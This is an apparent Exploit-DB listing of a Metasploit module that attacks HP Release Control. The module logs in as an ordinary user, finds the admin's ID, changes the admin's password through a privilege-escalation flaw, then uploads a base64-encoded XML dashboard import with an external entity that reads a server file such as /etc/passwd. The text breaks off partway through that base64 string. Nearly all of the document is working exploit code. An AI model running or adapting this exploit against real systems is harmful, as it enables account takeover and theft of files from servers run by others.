"HP Release Control - (Authenticated) XML External Entity (Metasploit)"

Author

Exploit author

"Brandon Perry"

Platform

Exploit platform

windows

Release date

Exploit published date

2014-05-19

                
                    
                         Download file
                    
                
            
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP Release Control Authenticated XXE',
      'Description'    => %q{
      This module take advantage of three separate vulnerabilities in order to
      read an arbitrary text file from the file system with the privileges
      of the web server. You must be authenticated, but can be unprivileged
      since a privilege escalation vulnerability is used. Tested against
      HP Release Control 9.20.0000, Build 395 installed with demo data.

      The first vulnerability allows an unprivileged authenticated user to list 
      the current users, their IDs, and even their password hashes. Can't login
      with hashes, but the ID is useful in the second vulnerability.

      When a user changes their password, they post the ID of the user who 
      is going to have their password changed. Just replace it with the 
      admin ID and you change the admin password. You are now admin.

      The third vulnerability is an XXE in the dashboard XML import mechanism.
      This is what allows you to read the file from the file system.

      This module is super ghetto half because it was an AMF application,
      half because I worked on it longer than I wanted to.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Brandon Perry <bperry.volatile [at] gmail.com>'
        ],
      'References'     =>
        [
        ],
      'DisclosureDate' => 'May 16 2014'
    ))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base directory path", '/']),
        OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/passwd"]),
        OptString.new('USERNAME', [true, "The username to authenticate with", "username"]),
        OptString.new('PASSWORD', [true, "The password to authenticate with", "password"])
      ], self.class)
  end

  def check
  end

  def run
    print_status("Authenticating")

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path)
    })

    cookie = res.get_cookies

    post = {
      'j_username' => datastore['USERNAME'],
      'j_password' => datastore['PASSWORD'],
      'buttonName' => ''
    }

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'ccm', 'j_spring_security_check'),
      'method' => 'POST',
      'vars_post' => post,
      'cookie' => cookie
    })

    if res and res.headers['Location'] !~ /index.jsp/
      fail_with("Authentication failed")
    end

    cookie = res.get_cookies

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'ccm', 'index.jsp'),
      'cookie' => cookie
    })

    cookie = cookie + res.get_cookies

    #not sure why this always fails the first time. Whatever.
    id = nil
    while id == nil
      id = get_admin_id(cookie)
    end

    print_status("Found admin id: " + id)
    print_status("Changing admin's password...")

    password = change_admin_password(cookie, id)
    print_status("Changed admin password to: " + password)

    post = {
      'j_username' => 'admin',
      'j_password' => password,
      'buttonName' => ''
    }

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path)
    })

    cookie = res.get_cookies

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'ccm', 'j_spring_security_check'),
      'method' => 'POST',
      'vars_post' => post,
      'cookie' => cookie
    })

    if res.headers['Location'] !~ /index.jsp/
      fail_with("Login failed")
    end

    cookie = res.get_cookies

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'ccm', 'index.jsp'),
      'cookie' => cookie
    })

    cookie = cookie + res.get_cookies

    post = {
      'com.mercury.dashboard.screen_resolution_width' => 2560,
      'com.mercury.dashboard.arch.fieldtree.date.timeZone' => 300,
      'com.mercury.dashboard.arch.fieldtree.date.zeroTimeUser' => 1400274351481
    }

    #need to send this so that the next request doesn't fail
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'ccm', 'dashboard', 'app', 'portal', 'PageView.jsp'),
      'method' => 'POST',
      'vars_post' => post,
      'cookie' => cookie
    })

    print_status("Exploiting XXE...")

    data = Rex::Text::decode_base64("LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDYyNzA3NjY3MTQ4MjQ1MjA2MDQ2NjQ5OTkyNg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJjb20ubWVyY3VyeS5kYXNoYm9hcmQuYXJjaC5maWVsZHRyZWUuZm9ybUZvckZpZWxkdHJlZS4iDQoNClkNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ2MjcwNzY2NzE0ODI0NTIwNjA0NjY0OTk5MjYNCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iLmltcG9ydEZyb21GaWxlIjsgZmlsZW5hbWU9IkRhc2hib2FyZF9PYmplY3RzX0V4cG9ydF8yMDE0MDUxNC54bWwiDQpDb250ZW50LVR5cGU6IHRleHQveG1sDQoNCjw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04IiBzdGFuZGFsb25lPSJubyI/Pgo8IURPQ1RZUEUgZm9vIFsKICAgPCFFTEVNRU5UIGZvbyBBTlkgPgogICA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiID5dPgo8RXhwb3J0TGlzdCB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIj48dmVyc2lvbj4yPC92ZXJzaW9uPjxNb2R1bGU+PG5hbWU+UmVsZWFzZSBDb250cm9sIERlZmF1bHQgTW9kdWxlPC9uYW1lPjx1dWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZjPC91dWlkPjxkZXNjcmlwdGlvbj4meHhlOzwvZGVzY3JpcHRpb24+PGVuYWJsZWQ+dHJ1ZTwvZW5hYmxlZD48YWxsb3dTZWxmU2VydmljZT5mYWxzZTwvYWxsb3dTZWxmU2VydmljZT48Y29waWFibGU+dHJ1ZTwvY29waWFibGU+PGFsbFVzZXJzQWNjZXNzPnRydWU8L2FsbFVzZXJzQWNjZXNzPjxwYWdlPjxwYWdlU2VxdWVuY2U+MDwvcGFnZVNlcXVlbmNlPjx0aXRsZT5UcmVuZHM8L3RpdGxlPjxwb3J0bGV0Pjx0aXRsZT5MYXRlbnQgQ2hhbmdlcyBPdmVyIFRpbWU8L3RpdGxlPjxwb3J0bGV0RGVmaW5pdGlvblV1aWQ+M2I3YmI2YWEwMjk3N2Y1Yzo2OTQwMjEwYjoxMTYzYmNiMzk0YTotN2ZkZjwvcG9ydGxldERlZmluaXRpb25VdWlkPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+ZGlzcGxheVByZWZTdW1tYXJ5PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlk8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5GaWx0ZXI8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WzI5NDkxOF1bTGF0ZW50XTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPkdyb3VwIEJ5PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlt3ZWVrXVtXZWVrXTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmNvbS5tZXJjdXJ5LmRhc2hib2FyZC5hcHAucG9ydGFsLmlzV2lkZVBvcnRsZXQ8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+dHJ1ZTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0Um93PjI8L2xheW91dFJvdz48bGF5b3V0V2lkdGg+MjwvbGF5b3V0V2lkdGg+PGlzTWluaW1pemVkPmZhbHNlPC9pc01pbmltaXplZD48aXNQb3J0bGV0Q29tbT5mYWxzZTwvaXNQb3J0bGV0Q29tbT48L3BvcnRsZXQ+PHBvcnRsZXQ+PHRpdGxlPkFibm9ybWFsIENoYW5nZXMgT3ZlciBUaW1lPC90aXRsZT48cG9ydGxldERlZmluaXRpb25VdWlkPjMyOWM4MTJjNTE3ODNlOWU6NmE5NTIwZjM6MTE2Mzk4MTdkYTI6LTdmZWI8L3BvcnRsZXREZWZpbml0aW9uVXVpZD48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPnBvcnRsZXRFZGl0ZWQ8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmRpc3BsYXlQcmVmU3VtbWFyeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5ZPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+RmlsdGVyPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlsyOTQ5MTJdW0FueV08L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5Hcm91cCBCeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bd2Vla11bV2Vla108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5jb20ubWVyY3VyeS5kYXNoYm9hcmQuYXBwLnBvcnRhbC5pc1dpZGVQb3J0bGV0PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPnRydWU8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFJvdz4xPC9sYXlvdXRSb3c+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxpc01pbmltaXplZD5mYWxzZTwvaXNNaW5pbWl6ZWQ+PGlzUG9ydGxldENvbW0+ZmFsc2U8L2lzUG9ydGxldENvbW0+PC9wb3J0bGV0Pjxwb3J0bGV0Pjx0aXRsZT5DaGFuZ2VzIE92ZXIgVGltZTwvdGl0bGU+PHBvcnRsZXREZWZpbml0aW9uVXVpZD4zMjljODEyYzUxNzgzZTllOjZhOTUyMGYzOjExNjM5ODE3ZGEyOi03ZmVjPC9wb3J0bGV0RGVmaW5pdGlvblV1aWQ+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5wb3J0bGV0RWRpdGVkPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlk8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5kaXNwbGF5UHJlZlN1bW1hcnk8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPkZpbHRlcjwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bMjk0OTEyXVtBbnldPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+R3JvdXAgQnk8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+W3dlZWtdW1dlZWtdPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+Y29tLm1lcmN1cnkuZGFzaGJvYXJkLmFwcC5wb3J0YWwuaXNXaWRlUG9ydGxldDwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT50cnVlPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48aXNNaW5pbWl6ZWQ+ZmFsc2U8L2lzTWluaW1pemVkPjxpc1BvcnRsZXRDb21tPmZhbHNlPC9pc1BvcnRsZXRDb21tPjwvcG9ydGxldD48YXV0b1JlZnJlc2g+ZmFsc2U8L2F1dG9SZWZyZXNoPjxyZWZyZXNoSW50ZXJ2YWw+MDwvcmVmcmVzaEludGVydmFsPjwvcGFnZT48cGFnZT48cGFnZVNlcXVlbmNlPjE8L3BhZ2VTZXF1ZW5jZT48dGl0bGU+QW5hbHlzaXM8L3RpdGxlPjxwb3J0bGV0Pjx0aXRsZT5BcHBsaWNhdGlvbiBTZXZlcml0eSBEaXN0cmlidXRpb248L3RpdGxlPjxwb3J0bGV0RGVmaW5pdGlvblV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTgwMDA8L3BvcnRsZXREZWZpbml0aW9uVXVpZD48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmRpc3BsYXlQcmVmU3VtbWFyeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5ZPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+UmVxdWVzdCBTdGF0dXM8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+W1BFTkRJTkdfQVBQUk9WQUxdW1BlbmRpbmcKCQkJCQkJCUFwcHJvdmFsXTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPlVzZXIgQXBwbGljYXRpb25zPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPltZXVtZZXNdPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+Y29tLm1lcmN1cnkuZGFzaGJvYXJkLmFwcC5wb3J0YWwuaXNXaWRlUG9ydGxldDwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT50cnVlPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48aXNNaW5pbWl6ZWQ+ZmFsc2U8L2lzTWluaW1pemVkPjxpc1BvcnRsZXRDb21tPmZhbHNlPC9pc1BvcnRsZXRDb21tPjwvcG9ydGxldD48cG9ydGxldD48dGl0bGU+Q2hhbmdlIFJlcXVlc3QgSW1wYWN0IEFuYWx5c2lzIFJhdGlvPC90aXRsZT48cG9ydGxldERlZmluaXRpb25VdWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZlPC9wb3J0bGV0RGVmaW5pdGlvblV1aWQ+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5kaXNwbGF5UHJlZlN1bW1hcnk8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPlJlcXVlc3QgU3RhdHVzPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPltQRU5ESU5HX0FQUFJPVkFMXVtQZW5kaW5nCgkJCQkJCQlBcHByb3ZhbF08L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5jb20ubWVyY3VyeS5kYXNoYm9hcmQuYXBwLnBvcnRhbC5pc1dpZGVQb3J0bGV0PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPnRydWU8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFJvdz4yPC9sYXlvdXRSb3c+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxpc01pbmltaXplZD5mYWxzZTwvaXNNaW5pbWl6ZWQ+PGlzUG9ydGxldENvbW0+ZmFsc2U8L2lzUG9ydGxldENvbW0+PC9wb3J0bGV0Pjxwb3J0bGV0Pjx0aXRsZT5BcHBsaWNhdGlvbiBTdGF0dXMgRGlzdHJpYnV0aW9uPC90aXRsZT48cG9ydGxldERlZmluaXRpb25VdWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZmPC9wb3J0bGV0RGVmaW5pdGlvblV1aWQ+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5kaXNwbGF5UHJlZlN1bW1hcnk8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPlVzZXIgQXBwbGljYXRpb25zPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPltZXVtZZXNdPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+VGltZSBGcmFtZTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bTGFzdCBNb250aF1bTGFzdCBNb250aF08L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5jb20ubWVyY3VyeS5kYXNoYm9hcmQuYXBwLnBvcnRhbC5pc1dpZGVQb3J0bGV0PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPnRydWU8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFJvdz4xPC9sYXlvdXRSb3c+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxpc01pbmltaXplZD5mYWxzZTwvaXNNaW5pbWl6ZWQ+PGlzUG9ydGxldENvbW0+ZmFsc2U8L2lzUG9ydGxldENvbW0+PC9wb3J0bGV0PjxhdXRvUmVmcmVzaD5mYWxzZTwvYXV0b1JlZnJlc2g+PHJlZnJlc2hJbnRlcnZhbD4wPC9yZWZyZXNoSW50ZXJ2YWw+PC9wYWdlPjxwYWdlPjxwYWdlU2VxdWVuY2U+MjwvcGFnZVNlcXVlbmNlPjx0aXRsZT5Qb3N0IEltcGxlbWVudGF0aW9uPC90aXRsZT48cG9ydGxldD48dGl0bGU+T3V0Y29tZSBPdmVyIFRpbWU8L3RpdGxlPjxwb3J0bGV0RGVmaW5pdGlvblV1aWQ+NmEzNjczYzlmZWI3NmRjYjotMzYyNTYxNjY6MTE3MmIyOTE1YTI6LTdmZjQ8L3BvcnRsZXREZWZpbml0aW9uVXVpZD48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPnBvcnRsZXRFZGl0ZWQ8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmRpc3BsYXlQcmVmU3VtbWFyeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5ZPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+RmlsdGVyPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlsyOTQ5MjBdW0Nsb3NlZF08L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5Hcm91cCBCeTwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bd2Vla11bV2Vla108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5jb20ubWVyY3VyeS5kYXNoYm9hcmQuYXBwLnBvcnRhbC5pc1dpZGVQb3J0bGV0PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPnRydWU8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFJvdz4wPC9sYXlvdXRSb3c+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxpc01pbmltaXplZD5mYWxzZTwvaXNNaW5pbWl6ZWQ+PGlzUG9ydGxldENvbW0+ZmFsc2U8L2lzUG9ydGxldENvbW0+PC9wb3J0bGV0Pjxwb3J0bGV0Pjx0aXRsZT5PdXRjb21lIEdyb3VwZWQgQnkgUmlzazwvdGl0bGU+PHBvcnRsZXREZWZpbml0aW9uVXVpZD42YTM2NzNjOWZlYjc2ZGNiOi01MTk3MDhjYzoxMTcyYmE1NzllZDotN2ZmMTwvcG9ydGxldERlZmluaXRpb25VdWlkPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+cG9ydGxldEVkaXRlZDwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5ZPC92YWx1ZT48L3ZhbHVlPjwvcHJlZmVyZW5jZVZhbHVlPjxwcmVmZXJlbmNlVmFsdWU+PG5hbWU+ZGlzcGxheVByZWZTdW1tYXJ5PC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlk8L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5GaWx0ZXI8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WzI5NDkyMF1bQ2xvc2VkXTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPk1pbmltdW4gVmFsdWU8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+WzBdW108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5JbnRlcnZhbDwvbmFtZT48dmFsdWU+PHNlcXVlbmNlPjA8L3NlcXVlbmNlPjx2YWx1ZT5bMTBdW108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5NYXhpbXVtIFZhbHVlPC9uYW1lPjx2YWx1ZT48c2VxdWVuY2U+MDwvc2VxdWVuY2U+PHZhbHVlPlsxMDBdW108L3ZhbHVlPjwvdmFsdWU+PC9wcmVmZXJlbmNlVmFsdWU+PHByZWZlcmVuY2VWYWx1ZT48bmFtZT5OdW1lcmljIFR5cGU8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+W2NhbGN1bGF0ZWQtcmlza11bY2FsY3VsYXRlZC1yaXNrXTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48cHJlZmVyZW5jZVZhbHVlPjxuYW1lPmNvbS5tZXJjdXJ5LmRhc2hib2FyZC5hcHAucG9ydGFsLmlzV2lkZVBvcnRsZXQ8L25hbWU+PHZhbHVlPjxzZXF1ZW5jZT4wPC9zZXF1ZW5jZT48dmFsdWU+dHJ1ZTwvdmFsdWU+PC92YWx1ZT48L3ByZWZlcmVuY2VWYWx1ZT48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0Um93PjE8L2xheW91dFJvdz48bGF5b3V0V2lkdGg+MjwvbGF5b3V0V2lkdGg+PGlzTWluaW1pemVkPmZhbHNlPC9pc01pbmltaXplZD48aXNQb3J0bGV0Q29tbT5mYWxzZTwvaXNQb3J0bGV0Q29tbT48L3BvcnRsZXQ+PGF1dG9SZWZyZXNoPmZhbHNlPC9hdXRvUmVmcmVzaD48cmVmcmVzaEludGVydmFsPjA8L3JlZnJlc2hJbnRlcnZhbD48L3BhZ2U+PC9Nb2R1bGU+PFBvcnRsZXREZWZpbml0aW9uPjxCYXJDaGFydFBvcnRsZXREZWZpbml0aW9uPjxDaGFydFBvcnRsZXREZWZpbml0aW9uPjxCdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGRhdGFTb3VyY2U+PGlkPkNIQU5HRV9JTVBBQ1RfQU5BTFlTSVNfUkFUSU88L2lkPjxuYW1lPkNoYW5nZSBSZXF1ZXN0IEltcGFjdCBBbmFseXNpcyBSYXRpbzwvbmFtZT48L2RhdGFTb3VyY2U+PHByZWZlcmVuY2VTdW1tYXJ5U2hvd24+dHJ1ZTwvcHJlZmVyZW5jZVN1bW1hcnlTaG93bj48cmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+ZmFsc2U8L3JlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PjxoZWxwVGV4dC8+PHByZWZlcmVuY2U+PG5hbWU+UmVxdWVzdCBTdGF0dXM8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5SZXF1ZXN0IFN0YXR1czwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPltQRU5ESU5HX0FQUFJPVkFMXVtQZW5kaW5nCgkJCQkJCQlBcHByb3ZhbF08L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+ZGVmd2FmZHNhZmRzYTwvY2hhcnRUaXRsZT48Y29sb3JTb3VyY2U+U3RhdHVzIENvbG9yPC9jb2xvclNvdXJjZT48dG9vbHRpcFNvdXJjZT4jIFJlcXVlc3RzPC90b29sdGlwU291cmNlPjx0b29sdGlwQ29udGFpbnNIVE1MPmZhbHNlPC90b29sdGlwQ29udGFpbnNIVE1MPjxvcmllbnRhdGlvbj52ZXJ0aWNhbDwvb3JpZW50YXRpb24+PGh5cGVybGluaz48aHlwZXJsaW5rVHlwZT5ub0h5cGVybGluazwvaHlwZXJsaW5rVHlwZT48aHlwZXJsaW5rU291cmNlLz48L2h5cGVybGluaz48L0NoYXJ0UG9ydGxldERlZmluaXRpb24+PGJhck5hbWVTb3VyY2U+U3RhdHVzPC9iYXJOYW1lU291cmNlPjxiYXJBeGlzTGFiZWw+U3RhdHVzPC9iYXJBeGlzTGFiZWw+PHZhbHVlU291cmNlPiMgUmVxdWVzdHM8L3ZhbHVlU291cmNlPjx2YWx1ZUF4aXNMYWJlbD4jIFJlcXVlc3RzPC92YWx1ZUF4aXNMYWJlbD48L0JhckNoYXJ0UG9ydGxldERlZmluaXRpb24+PHR5cGU+QmFyQ2hhcnQ8L3R5cGU+PG5hbWU+Q2hhbmdlIFJlcXVlc3QgSW1wYWN0IEFuYWx5c2lzIFJhdGlvPC9uYW1lPjx1dWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZlPC91dWlkPjxkZXNjcmlwdGlvbi8+PHRpbWVvdXQ+MjA8L3RpbWVvdXQ+PGRlZmF1bHRXaWR0aD4xPC9kZWZhdWx0V2lkdGg+PGVuYWJsZWQ+dHJ1ZTwvZW5hYmxlZD48ZXhwb3J0QXNXU1JQPnRydWU8L2V4cG9ydEFzV1NSUD48c3VwcG9ydERyaWxsVG8+dHJ1ZTwvc3VwcG9ydERyaWxsVG8+PHBvcnRsZXRDb21tU3VwPmZhbHNlPC9wb3J0bGV0Q29tbVN1cD48YnVpbHRJbj5mYWxzZTwvYnVpb